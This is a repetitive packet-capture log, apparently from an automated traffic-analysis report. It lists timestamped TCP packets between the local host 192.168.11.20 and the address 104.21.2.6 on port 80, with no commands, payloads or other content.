                                                                    Nov 28, 2022 16:37:04.098052025 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.098068953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098079920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098090887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098103046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098114014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098124027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098134995 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098272085 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.098303080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098315001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.098474026 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.098643064 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.098778009 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.101170063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.101182938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.101262093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.101273060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.101284027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.101295948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.101306915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.101317883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.101486921 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.101655960 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.102535963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102667093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102679968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102690935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102701902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102713108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102725983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102736950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102746964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102757931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102768898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102780104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102791071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102801085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102812052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102823019 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102833986 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102844000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102854967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102865934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.102924109 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.102924109 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.103085041 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.103115082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.103127956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.103137970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.103220940 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.103391886 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.103391886 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.176299095 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.185185909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185200930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185261965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185329914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185342073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185353041 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185364008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185374975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185385942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185419083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185430050 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185441017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185451984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185470104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185487032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185492992 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.185519934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185535908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185547113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185558081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185568094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185579062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185590029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185600996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185611010 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185625076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185651064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185662031 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.185662031 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.185662031 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.185672045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185683966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185694933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185707092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185718060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185729027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185739994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185751915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185762882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185823917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185833931 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.185851097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185867071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185879946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185892105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185904026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185916901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185929060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185941935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185954094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185966969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185978889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.185991049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186002016 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.186011076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186032057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186217070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186219931 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.186362982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186392069 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.186392069 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.186409950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186423063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186435938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186449051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186460972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186472893 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186485052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186496973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186510086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186522007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186533928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186546087 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186558008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186562061 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.186583996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186604977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186630011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186644077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186656952 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186669111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186681032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186693907 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186706066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186717987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186729908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186743975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186755896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186768055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186779022 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.186779022 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.186786890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186799049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186811924 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186825037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.186950922 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.187063932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187119961 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.187227964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187241077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187252998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187272072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187292099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187334061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187339067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.187351942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187381983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187393904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187405109 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187417030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187427998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187439919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187484980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187495947 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187508106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187510967 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.187608004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187679052 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.187679052 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.187710047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187757969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187769890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187783003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187793970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187805891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187849045 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.187865973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187876940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187889099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187903881 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187922955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187943935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187963009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187977076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.187988997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188002110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188014030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188019037 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.188019037 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.188035011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188046932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188060045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188071966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188085079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188097000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188108921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188121080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188133955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188146114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188158035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188169956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188183069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188189983 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.188190937 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.188190937 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.188205957 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188219070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188359022 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.188528061 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.188658953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188699007 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.188765049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188792944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188837051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188848972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188859940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188874006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188885927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188899040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188916922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188919067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.188934088 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188954115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188976049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.188997030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.189088106 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.189088106 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.189088106 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.189146996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.189157963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.189169884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.189258099 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.189426899 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.189598083 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.195971012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196054935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196106911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196120024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196134090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196146011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196157932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196213007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196224928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196237087 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196249008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196260929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196271896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196284056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196295023 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.196295023 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.196316004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196329117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196340084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196369886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196382046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196393013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196403980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196417093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196434975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196461916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196465969 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.196490049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196510077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196530104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196549892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196568966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196588039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196624994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196634054 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.196634054 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.196654081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196671009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196690083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196710110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196727037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196748018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196768999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196789026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196805954 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.196820021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196842909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196862936 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196883917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196906090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196929932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196950912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196969986 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.196975946 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.197000027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197022915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197026014 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.197026014 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.197050095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197171926 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197184086 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.197276115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197299004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197324038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197345018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197355032 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.197379112 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197402954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197427034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197452068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197470903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197490931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197510004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197524071 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.197530031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197541952 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197554111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197565079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197576046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197587967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197598934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197607994 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.197616100 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197628021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197638988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197650909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197662115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197673082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197685003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197695971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197706938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197717905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197730064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197741032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197752953 CET8049830104.21.2.6192.168.11.20
